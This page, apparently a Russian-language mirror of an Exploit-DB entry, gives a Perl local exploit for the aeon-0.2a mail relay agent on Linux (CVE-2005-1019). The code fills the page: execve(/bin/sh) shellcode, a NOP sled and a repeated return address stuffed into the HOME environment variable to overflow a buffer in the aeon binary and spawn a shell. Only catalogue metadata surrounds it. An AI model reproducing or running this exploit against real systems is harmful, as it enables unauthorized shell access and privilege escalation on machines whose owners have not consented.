- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 913
- Проверка EDB
-
- Пройдено
- Автор
- LAMMAT
- Тип уязвимости
- LOCAL
- Платформа
- LINUX
- CVE
- cve-2005-1019
- Дата публикации
- 2005-04-05
Код:
#!/usr/bin/perl
# Aeon-mail relay agent for Linux *
# *
# written by lammat just for practice purposes *
# tested against aeon-0.2a *
# http://grpower.ath.cx *
# [email protected] *
# execve(/bin/sh) for linux x86
# 29 bytes
# by Matias Sedalo
$shellcode =
"\x31\xdb\x53\x8d\x43\x17\xcd\x80\x99\x68\x6e\x2f\x73\x68\x68".
"\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
$buf = 528;
$ret = 0xbfffe122;
$nop = "\x90";
if (@ARGV == 1) {
$offset = $ARGV[0];
}
for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l', ($ret + $offset));
until (length($buffer) == $buf) {
$buffer .= $new_ret;
}
local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i");
# milw0rm.com [2005-04-05]- Источник
- www.exploit-db.com
